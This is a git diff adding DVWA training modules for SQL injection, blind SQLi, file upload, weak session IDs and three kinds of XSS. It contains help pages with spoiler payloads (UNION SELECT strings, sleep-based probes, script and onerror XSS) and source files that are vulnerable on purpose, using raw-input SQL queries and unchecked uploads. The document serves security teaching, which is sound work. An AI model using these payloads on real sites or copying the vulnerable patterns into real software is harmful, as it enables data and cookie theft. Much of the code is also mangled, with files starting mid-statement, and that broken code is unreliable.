+ About+A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. + A successful SQL injection exploit can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database + (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system (load_file) and in some cases issue commands to the operating system. + +SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. + +This attack may also be called "SQLi". + ++ + Objective+There are 5 users in the database, with id's from 1 to 5. Your mission... to steal their passwords via SQLi. + ++ + Low Level+The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able + to execute any SQL query they wish. +Spoiler: ?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit.
+
+ + + Medium Level+The medium level uses a form of SQL injection protection, with the function of + "". + However due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered. + +The text box has been replaced with a pre-defined dropdown list and uses POST to submit the form. +Spoiler: ?id=a UNION SELECT 1,2;-- -&Submit=Submit.
+
+ + + High Level+This is very similar to the low level, however this time the attacker is inputting the value in a different manner. + The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request. +Spoiler: ID: a' UNION SELECT "text1","text2";-- -&Submit=Submit.
+
+ + + Impossible Level+The queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer, + and has distinguish which sections are code, and the rest is data. + |
+
+ +
Reference:
+Vulnerability: SQL Injection
+ +";
+if( $vulnerabilityFile == 'high.php' ) {
+ $page[ 'body' ] .= "Click here to change your ID.";
+}
+else {
+ $page[ 'body' ] .= "
+ ";
+}
+$page[ 'body' ] .= "
+ {$html}
+
+
+ More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/SQL_Injection' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://bobby-tables.com/' ) . " +
"; + $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}
"; + $page[ 'body' ] .= ""; +} + +$page[ 'body' ] .= " + +
+
+ +"; + +dvwaSourceHtmlEcho( $page ); + +?> + + diff --git a/DVWA/vulnerabilities/sqli/source/high.php b/DVWA/vulnerabilities/sqli/source/high.php new file mode 100644 index 00000000..996eee12 --- /dev/null +++ b/DVWA/vulnerabilities/sqli/source/high.php @@ -0,0 +1,53 @@ +Something went wrong.' ); + + // Get results + while( $row = mysqli_fetch_assoc( $result ) ) { + // Get values + $first = $row["first_name"]; + $last = $row["last_name"]; + + // Feedback for end user + $html .= "
ID: {$id}
First name: {$first}
Surname: {$last}";
+ }
+
+ ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
+ break;
+ case SQLITE:
+ global $sqlite_db_connection;
+
+ $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
+ #print $query;
+ try {
+ $results = $sqlite_db_connection->query($query);
+ } catch (Exception $e) {
+ echo 'Caught exception: ' . $e->getMessage();
+ exit();
+ }
+
+ if ($results) {
+ while ($row = $results->fetchArray()) {
+ // Get values
+ $first = $row["first_name"];
+ $last = $row["last_name"];
+
+ // Feedback for end user
+ $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
+ }
+ } else {
+ echo "Error in fetch ".$sqlite_db->lastErrorMsg();
+ }
+ break;
+ }
+}
+
+?>
diff --git a/DVWA/vulnerabilities/sqli/source/impossible.php b/DVWA/vulnerabilities/sqli/source/impossible.php
new file mode 100644
index 00000000..ff9effcb
--- /dev/null
+++ b/DVWA/vulnerabilities/sqli/source/impossible.php
@@ -0,0 +1,65 @@
+prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
+ $data->bindParam( ':id', $id, PDO::PARAM_INT );
+ $data->execute();
+ $row = $data->fetch();
+
+ // Make sure only 1 result is returned
+ if( $data->rowCount() == 1 ) {
+ // Get values
+ $first = $row[ 'first_name' ];
+ $last = $row[ 'last_name' ];
+
+ // Feedback for end user
+ $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
+ }
+ break;
+ case SQLITE:
+ global $sqlite_db_connection;
+
+ $stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );
+ $stmt->bindValue(':id',$id,SQLITE3_INTEGER);
+ $result = $stmt->execute();
+ $result->finalize();
+ if ($result !== false) {
+ // There is no way to get the number of rows returned
+ // This checks the number of columns (not rows) just
+ // as a precaution, but it won't stop someone dumping
+ // multiple rows and viewing them one at a time.
+
+ $num_columns = $result->numColumns();
+ if ($num_columns == 2) {
+ $row = $result->fetchArray();
+
+ // Get values
+ $first = $row[ 'first_name' ];
+ $last = $row[ 'last_name' ];
+
+ // Feedback for end user
+ $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
+ }
+ }
+
+ break;
+ }
+ }
+}
+
+// Generate Anti-CSRF token
+generateSessionToken();
+
+?>
diff --git a/DVWA/vulnerabilities/sqli/source/low.php b/DVWA/vulnerabilities/sqli/source/low.php
new file mode 100644
index 00000000..6d84afc3
--- /dev/null
+++ b/DVWA/vulnerabilities/sqli/source/low.php
@@ -0,0 +1,56 @@
+' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
+
+ // Get results
+ while( $row = mysqli_fetch_assoc( $result ) ) {
+ // Get values
+ $first = $row["first_name"];
+ $last = $row["last_name"];
+
+ // Feedback for end user
+ $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
+ }
+
+ mysqli_close($GLOBALS["___mysqli_ston"]);
+ break;
+ case SQLITE:
+ global $sqlite_db_connection;
+
+ #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
+ #$sqlite_db_connection->enableExceptions(true);
+
+ $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
+ #print $query;
+ try {
+ $results = $sqlite_db_connection->query($query);
+ } catch (Exception $e) {
+ echo 'Caught exception: ' . $e->getMessage();
+ exit();
+ }
+
+ if ($results) {
+ while ($row = $results->fetchArray()) {
+ // Get values
+ $first = $row["first_name"];
+ $last = $row["last_name"];
+
+ // Feedback for end user
+ $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
+ }
+ } else {
+ echo "Error in fetch ".$sqlite_db->lastErrorMsg();
+ }
+ break;
+ }
+}
+
+?>
diff --git a/DVWA/vulnerabilities/sqli/source/medium.php b/DVWA/vulnerabilities/sqli/source/medium.php
new file mode 100644
index 00000000..7dab403e
--- /dev/null
+++ b/DVWA/vulnerabilities/sqli/source/medium.php
@@ -0,0 +1,59 @@
+' . mysqli_error($GLOBALS["___mysqli_ston"]) . '' );
+
+ // Get results
+ while( $row = mysqli_fetch_assoc( $result ) ) {
+ // Display values
+ $first = $row["first_name"];
+ $last = $row["last_name"];
+
+ // Feedback for end user
+ $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
+ }
+ break;
+ case SQLITE:
+ global $sqlite_db_connection;
+
+ $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
+ #print $query;
+ try {
+ $results = $sqlite_db_connection->query($query);
+ } catch (Exception $e) {
+ echo 'Caught exception: ' . $e->getMessage();
+ exit();
+ }
+
+ if ($results) {
+ while ($row = $results->fetchArray()) {
+ // Get values
+ $first = $row["first_name"];
+ $last = $row["last_name"];
+
+ // Feedback for end user
+ $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
+ }
+ } else {
+ echo "Error in fetch ".$sqlite_db->lastErrorMsg();
+ }
+ break;
+ }
+}
+
+// This is used later on in the index.php page
+// Setting it here so we can close the database connection in here like in the rest of the source scripts
+$query = "SELECT COUNT(*) FROM users;";
+$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); +$number_of_rows = mysqli_fetch_row( $result )[0]; + +mysqli_close($GLOBALS["___mysqli_ston"]); +?> diff --git a/DVWA/vulnerabilities/sqli/test.php b/DVWA/vulnerabilities/sqli/test.php new file mode 100644 index 00000000..aaadf8e5 --- /dev/null +++ b/DVWA/vulnerabilities/sqli/test.php @@ -0,0 +1,14 @@ +"; +} +?> diff --git a/DVWA/vulnerabilities/sqli_blind/cookie-input.php b/DVWA/vulnerabilities/sqli_blind/cookie-input.php new file mode 100644 index 00000000..d4234ea8 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/cookie-input.php @@ -0,0 +1,31 @@ +
"; + $page[ 'body' ] .= ""; +} + +$page[ 'body' ] .= " + +
+
+ +"; + +dvwaSourceHtmlEcho( $page ); + +?> + + diff --git a/DVWA/vulnerabilities/sqli_blind/help/help.php b/DVWA/vulnerabilities/sqli_blind/help/help.php new file mode 100644 index 00000000..e1212cc4 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/help/help.php @@ -0,0 +1,62 @@ +
+
+ +
diff --git a/DVWA/vulnerabilities/sqli_blind/index.php b/DVWA/vulnerabilities/sqli_blind/index.php
new file mode 100644
index 00000000..5c4bfb5e
--- /dev/null
+++ b/DVWA/vulnerabilities/sqli_blind/index.php
@@ -0,0 +1,97 @@
+The PHP function \"Magic Quotes\" is enabled.";
+}
+// Is PHP function safe_mode enabled?
+if( ini_get( 'safe_mode' ) == true ) {
+ $WarningHtml .= "Help - SQL Injection (Blind)
+ +
+
+
+
+
+
+
+ About+When an attacker executes SQL injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL query's syntax is incorrect. + Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, + they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. + An attacker can still steal data by asking a series of True and False questions through SQL statements, and monitoring how the web application response + (valid entry retunred or 404 header set). + +"time based" injection method is often used when there is no visible feedback in how the page different in its response (hence its a blind attack). + This means the attacker will wait to see how long the page takes to response back. If it takes longer than normal, their query was successful. + ++ + Objective+Find the version of the SQL database software through a blind SQL attack. + ++ + Low Level+The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able + to execute any SQL query they wish. +Spoiler: ?id=1' AND sleep 5&Submit=Submit.
+
+ + + Medium Level+The medium level uses a form of SQL injection protection, with the function of + "". + However due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered. + +The text box has been replaced with a pre-defined dropdown list and uses POST to submit the form. +Spoiler: ?id=1 AND sleep 3&Submit=Submit.
+
+ + + High Level+This is very similar to the low level, however this time the attacker is inputting the value in a different manner. + The input values are being set on a different page, rather than a GET request. +Spoiler: ID: 1' AND sleep 10&Submit=Submit. + Spoiler: Should be able to cut out the middle man..+ + + + Impossible Level+The queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer, + and has distinguish which sections are code, and the rest is data. + |
+
+ +
Reference:
+The PHP function \"Safe mode\" is enabled.
";
+}
+
+$page[ 'body' ] .= "
+
+
\n";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/sqli_blind/source/high.php b/DVWA/vulnerabilities/sqli_blind/source/high.php
new file mode 100644
index 00000000..985ac155
--- /dev/null
+++ b/DVWA/vulnerabilities/sqli_blind/source/high.php
@@ -0,0 +1,63 @@
+ 0); // The '@' character suppresses errors
+ } catch(Exception $e) {
+ $exists = false;
+ }
+ }
+
+ ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
+ break;
+ case SQLITE:
+ global $sqlite_db_connection;
+
+ $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
+ try {
+ $results = $sqlite_db_connection->query($query);
+ $row = $results->fetchArray();
+ $exists = $row !== false;
+ } catch(Exception $e) {
+ $exists = false;
+ }
+
+ break;
+ }
+
+ if ($exists) {
+ // Feedback for end user
+ $html .= 'Vulnerability: SQL Injection (Blind)
+ + {$WarningHtml} + +";
+if( $vulnerabilityFile == 'high.php' ) {
+ $page[ 'body' ] .= "Click here to change your ID.";
+}
+else {
+ $page[ 'body' ] .= "
+ ";
+}
+$page[ 'body' ] .= "
+ {$html}
+
+
+ More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Blind_SQL_Injection' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://bobby-tables.com/' ) . " +
User ID exists in the database.'; + } + else { + // Might sleep a random amount + if( rand( 0, 5 ) == 3 ) { + sleep( rand( 2, 4 ) ); + } + + // User wasn't found, so the page wasn't! + header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user + $html .= '
User ID is MISSING from the database.'; + } +} + +?> diff --git a/DVWA/vulnerabilities/sqli_blind/source/impossible.php b/DVWA/vulnerabilities/sqli_blind/source/impossible.php new file mode 100644 index 00000000..67ba79c5 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/source/impossible.php @@ -0,0 +1,65 @@ +prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); + $data->bindParam( ':id', $id, PDO::PARAM_INT ); + $data->execute(); + + $exists = $data->rowCount(); + break; + case SQLITE: + global $sqlite_db_connection; + + $stmt = $sqlite_db_connection->prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' ); + $stmt->bindValue(':id',$id,SQLITE3_INTEGER); + $result = $stmt->execute(); + $result->finalize(); + if ($result !== false) { + // There is no way to get the number of rows returned + // This checks the number of columns (not rows) just + // as a precaution, but it won't stop someone dumping + // multiple rows and viewing them one at a time. + + $num_columns = $result->numColumns(); + if ($num_columns == 1) { + $row = $result->fetchArray(); + + $numrows = $row[ 'numrows' ]; + $exists = ($numrows == 1); + } + } + break; + } + + } + + // Get results + if ($exists) { + // Feedback for end user + $html .= '
User ID exists in the database.'; + } else { + // User wasn't found, so the page wasn't! + header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user + $html .= '
User ID is MISSING from the database.'; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/sqli_blind/source/low.php b/DVWA/vulnerabilities/sqli_blind/source/low.php new file mode 100644 index 00000000..dd04a8e8 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/source/low.php @@ -0,0 +1,57 @@ + 0); + } catch(Exception $e) { + $exists = false; + } + } + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); + break; + case SQLITE: + global $sqlite_db_connection; + + $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; + try { + $results = $sqlite_db_connection->query($query); + $row = $results->fetchArray(); + $exists = $row !== false; + } catch(Exception $e) { + $exists = false; + } + + break; + } + + if ($exists) { + // Feedback for end user + $html .= '
User ID exists in the database.'; + } else { + // User wasn't found, so the page wasn't! + header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user + $html .= '
User ID is MISSING from the database.'; + } + +} + +?> diff --git a/DVWA/vulnerabilities/sqli_blind/source/medium.php b/DVWA/vulnerabilities/sqli_blind/source/medium.php new file mode 100644 index 00000000..95b9a82a --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/source/medium.php @@ -0,0 +1,54 @@ + 0); // The '@' character suppresses errors + } catch(Exception $e) { + $exists = false; + } + } + + break; + case SQLITE: + global $sqlite_db_connection; + + $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; + try { + $results = $sqlite_db_connection->query($query); + $row = $results->fetchArray(); + $exists = $row !== false; + } catch(Exception $e) { + $exists = false; + } + break; + } + + if ($exists) { + // Feedback for end user + $html .= '
User ID exists in the database.'; + } else { + // Feedback for end user + $html .= '
User ID is MISSING from the database.'; + } +} + +?> diff --git a/DVWA/vulnerabilities/upload/help/help.php b/DVWA/vulnerabilities/upload/help/help.php new file mode 100644 index 00000000..9ef48a75 --- /dev/null +++ b/DVWA/vulnerabilities/upload/help/help.php @@ -0,0 +1,54 @@ +
+
+ +
+
diff --git a/DVWA/vulnerabilities/upload/index.php b/DVWA/vulnerabilities/upload/index.php
new file mode 100644
index 00000000..149ccec7
--- /dev/null
+++ b/DVWA/vulnerabilities/upload/index.php
@@ -0,0 +1,75 @@
+Incorrect folder permissions: {$PHPUploadPath}Help - File Upload
+ +
+
+
+
+
+
+
+ About+Uploaded files represent a significant risk to web applications. The first step in many attacks is to get some code to the system to be attacked. + Then the attacker only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. + +The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend systems, + and simple defacement. It depends on what the application does with the uploaded file, including where it is stored. + ++ + Objective+Execute any PHP function of your choosing on the target system (such as + or ) thanks to this file upload vulnerability. + ++ + Low Level+Low level will not check the contents of the file being uploaded in any way. It relies only on trust. +Spoiler: Upload any valid PHP file with command in it.
+
+ + + Medium Level+When using the medium level, it will check the reported file type from the client when its being uploaded. +Spoiler: Worth looking for any restrictions within any "hidden" form fields.
+
+ + + High Level+Once the file has been received from the client, the server will try to resize any image that was included in the request. +Spoiler: need to link in another vulnerability, such as file inclusion.
+
+ + + Impossible Level+This will check everything from all the levels so far, as well then to re-encode the image. This will make a new image, therefor stripping + any "non-image" code (including metadata). + |
+
+ +
Reference:
+Folder is not writable."; +} +// Is PHP-GD installed? +if( ( !extension_loaded( 'gd' ) || !function_exists( 'gd_info' ) ) ) { + $WarningHtml .= "
The PHP module GD is not installed.
";
+}
+
+$page[ 'body' ] .= "
+
+
";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/upload/source/high.php b/DVWA/vulnerabilities/upload/source/high.php
new file mode 100644
index 00000000..7dfa80d2
--- /dev/null
+++ b/DVWA/vulnerabilities/upload/source/high.php
@@ -0,0 +1,35 @@
+Your image was not uploaded.';
+ }
+ else {
+ // Yes!
+ $html .= "Vulnerability: File Upload
+ + {$WarningHtml} + +
+
+ {$html}
+
+
+ More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.acunetix.com/websitesecurity/upload-forms-threat/' ) . " +
{$target_path} succesfully uploaded!";
+ }
+ }
+ else {
+ // Invalid file
+ $html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.'; + } +} + +?> diff --git a/DVWA/vulnerabilities/upload/source/impossible.php b/DVWA/vulnerabilities/upload/source/impossible.php new file mode 100644 index 00000000..376f75aa --- /dev/null +++ b/DVWA/vulnerabilities/upload/source/impossible.php @@ -0,0 +1,62 @@ +{$target_file} succesfully uploaded!"; + } + else { + // No + $html .= '
Your image was not uploaded.'; + } + + // Delete any temp files + if( file_exists( $temp_file ) ) + unlink( $temp_file ); + } + else { + // Invalid file + $html .= '
Your image was not uploaded. We can only accept JPEG or PNG images.'; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/upload/source/low.php b/DVWA/vulnerabilities/upload/source/low.php new file mode 100644 index 00000000..85ffa081 --- /dev/null +++ b/DVWA/vulnerabilities/upload/source/low.php @@ -0,0 +1,19 @@ +Your image was not uploaded.'; + } + else { + // Yes! + $html .= "
{$target_path} succesfully uploaded!";
+ }
+}
+
+?>
diff --git a/DVWA/vulnerabilities/upload/source/medium.php b/DVWA/vulnerabilities/upload/source/medium.php
new file mode 100644
index 00000000..bb902701
--- /dev/null
+++ b/DVWA/vulnerabilities/upload/source/medium.php
@@ -0,0 +1,33 @@
+Your image was not uploaded.';
+ }
+ else {
+ // Yes!
+ $html .= "{$target_path} succesfully uploaded!";
+ }
+ }
+ else {
+ // Invalid file
+ $html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.'; + } +} + +?> diff --git a/DVWA/vulnerabilities/view_help.php b/DVWA/vulnerabilities/view_help.php new file mode 100644 index 00000000..65236730 --- /dev/null +++ b/DVWA/vulnerabilities/view_help.php @@ -0,0 +1,40 @@ +' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.php" ) . '' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.{$locale}.php" ) . 'Not Found"; +} + +$page[ 'body' ] .= " + + + +
+ {$help}
+
\n";
+
+dvwaHelpHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/view_source.php b/DVWA/vulnerabilities/view_source.php
new file mode 100644
index 00000000..16c99cd3
--- /dev/null
+++ b/DVWA/vulnerabilities/view_source.php
@@ -0,0 +1,103 @@
+vulnerabilities/{$id}/source/{$security}.js
+
+
+
+
+ ";
+ }
+
+ $page[ 'body' ] .= "
+ " . highlight_string( $js_source, true ) . " |
+
+
+ + +
\n";
+} else {
+ $page['body'] = "{$vuln} Source
+ +vulnerabilities/{$id}/source/{$security}.php
+
+
+
+
+ {$js_html}
+ " . highlight_string( $source, true ) . " |
+
+ + +
Not found
"; +} + +dvwaSourceHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/view_source_all.php b/DVWA/vulnerabilities/view_source_all.php new file mode 100644 index 00000000..876de367 --- /dev/null +++ b/DVWA/vulnerabilities/view_source_all.php @@ -0,0 +1,122 @@ + +{$vuln}
++ +
Impossible {$vuln} Source
+{$impsrc} |
+
+ +
High {$vuln} Source
+{$highsrc} |
+
+ +
Medium {$vuln} Source
+{$medsrc} |
+
+ +
Low {$vuln} Source
+{$lowsrc} |
+
+ + + + \n"; +} else { + $page['body'] = "
Not found
"; +} + +dvwaSourceHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/weak_id/help/help.php b/DVWA/vulnerabilities/weak_id/help/help.php new file mode 100644 index 00000000..e0087f41 --- /dev/null +++ b/DVWA/vulnerabilities/weak_id/help/help.php @@ -0,0 +1,40 @@ +
+
diff --git a/DVWA/vulnerabilities/weak_id/index.php b/DVWA/vulnerabilities/weak_id/index.php
new file mode 100644
index 00000000..72dc94cd
--- /dev/null
+++ b/DVWA/vulnerabilities/weak_id/index.php
@@ -0,0 +1,61 @@
+
+ Help - Weak Session IDs
+ +
+
+
+
+
+
+
+ About+Knowledge of a session ID is often the only thing required to access a site as a specific user after they have logged in, if that session ID is able to be calculated or easily guessed, then an attacker will have an easy way to gain access to user accounts without having to brute force passwords or find other vulnerabilities such as Cross-Site Scripting. + ++ + Objective+This module uses four different ways to set the dvwaSession cookie value, the objective of each level is to work out how the ID is generated and then infer the IDs of other system users. + ++ + Low Level+The cookie value should be very obviously predictable. + +Medium Level+The value looks a little more random than on low but if you collect a few you should start to see a pattern. + +High Level+First work out what format the value is in and then try to work out what is being used as the input to generate the values. +Extra flags are also being added to the cookie, this does not affect the challenge but highlights extra protections that can be added to protect the cookies. + + +Impossible Level+The cookie value should not be predictable at this level but feel free to try. +As well as the extra flags, the cookie is being tied to the domain and the path of the challenge. + |
+
Reference:
+Reference:
+Vulnerability: Weak Session IDs
+
+ This page will set a new cookie called dvwaSession each time the button is clicked.
+
+
+ +
diff --git a/DVWA/vulnerabilities/xss_d/index.php b/DVWA/vulnerabilities/xss_d/index.php
new file mode 100644
index 00000000..955b1a70
--- /dev/null
+++ b/DVWA/vulnerabilities/xss_d/index.php
@@ -0,0 +1,79 @@
+
+ Help - Cross Site Scripting (DOM Based)
+ +
+
+
+
+
+
+
+ About+"Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. + XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, + to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output, + without validating or encoding it. + +An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, + and will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other + sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. + +DOM Based XSS is a special case of reflected where the JavaScript is hidden in the URL and pulled out by JavaScript in the page while it is rendering rather than being embedded in the page when it is served. This can make it stealthier than other attacks and WAFs or other protections which are reading the page body do not see any malicious content. + ++ + Objective+Run your own JavaScript in another user's browser, use this to steal the cookie of a logged in user. + ++ + Low Level+Low level will not check the requested input, before including it to be used in the output text. +Spoiler: alert(1)")?>.
+
+ Medium Level+The developer has tried to add a simple pattern matching to remove any references to "<script" to disable any JavaScript. Find a way to run JavaScript without using the script tags. +Spoiler: You must first break out of the select block then you can add an image with an onerror event:
+
+ High Level+The developer is now white listing only the allowed languages, you must find a way to run your code without it going to the server. +Spoiler: The fragment section of a URL (anything after the # symbol) does not get sent to the server and so cannot be blocked. The bad JavaScript being used to render the page reads the content from it when creating the page.
+
+ Impossible Level+The contents taken from the URL are encoded by default by most browsers which prevents any injected JavaScript from being executed. + |
+
+ +
Reference:
+Vulnerability: DOM Based Cross Site Scripting (XSS)
+ +
+
+
+EOF;
+
+$page[ 'body' ] .= "
+ Please choose a language:
+ + +More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss/' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/DOM_Based_XSS' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.acunetix.com/blog/articles/dom-xss-explained/' ) . " +
+
+ +
diff --git a/DVWA/vulnerabilities/xss_r/index.php b/DVWA/vulnerabilities/xss_r/index.php
new file mode 100644
index 00000000..76749c20
--- /dev/null
+++ b/DVWA/vulnerabilities/xss_r/index.php
@@ -0,0 +1,66 @@
+
+ Help - Cross Site Scripting (Reflected)
+ +
+
+
+
+
+
+
+ About+"Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. + XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, + to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output, + without validating or encoding it. + +An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, + and will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other + sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. + +Because its a reflected XSS, the malicious code is not stored in the remote web application, so requires some social engineering (such as a link via email/chat). + ++ + Objective+One way or another, steal the cookie of a logged in user. + ++ + Low Level+Low level will not check the requested input, before including it to be used in the output text. +Spoiler: ?name=<script>alert("XSS");</script>.
+
+ + + Medium Level+The developer has tried to add a simple pattern matching to remove any references to "<script>", to disable any JavaScript. +Spoiler: Its cAse sENSiTiVE.
+
+ + + High Level+The developer now believes they can disable all JavaScript by removing the pattern "<s*c*r*i*p*t". +Spoiler: HTML events.
+
+ + + Impossible Level+Using inbuilt PHP functions (such as ""), + its possible to escape any values which would alter the behaviour of the input. + |
+
+ +
Reference:
+Vulnerability: Reflected Cross Site Scripting (XSS)
+ +
+
+ {$html}
+
+
+ More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss/' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/xss-filter-evasion-cheatsheet' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_scripting' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/xss-faq.html' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.scriptalert1.com/' ) . " +
Hello {$name}";
+}
+
+?>
diff --git a/DVWA/vulnerabilities/xss_s/help/help.php b/DVWA/vulnerabilities/xss_s/help/help.php
new file mode 100644
index 00000000..0bfd3b2e
--- /dev/null
+++ b/DVWA/vulnerabilities/xss_s/help/help.php
@@ -0,0 +1,56 @@
+
+
+ +
diff --git a/DVWA/vulnerabilities/xss_s/index.php b/DVWA/vulnerabilities/xss_s/index.php
new file mode 100644
index 00000000..59afba68
--- /dev/null
+++ b/DVWA/vulnerabilities/xss_s/index.php
@@ -0,0 +1,87 @@
+' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
+}
+
+$vulnerabilityFile = '';
+switch( dvwaSecurityLevelGet() ) {
+ case 'low':
+ $vulnerabilityFile = 'low.php';
+ break;
+ case 'medium':
+ $vulnerabilityFile = 'medium.php';
+ break;
+ case 'high':
+ $vulnerabilityFile = 'high.php';
+ break;
+ default:
+ $vulnerabilityFile = 'impossible.php';
+ break;
+}
+
+require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/xss_s/source/{$vulnerabilityFile}";
+
+$page[ 'body' ] .= "
+Help - Cross Site Scripting (Stored)
+ +
+
+
+
+
+
+
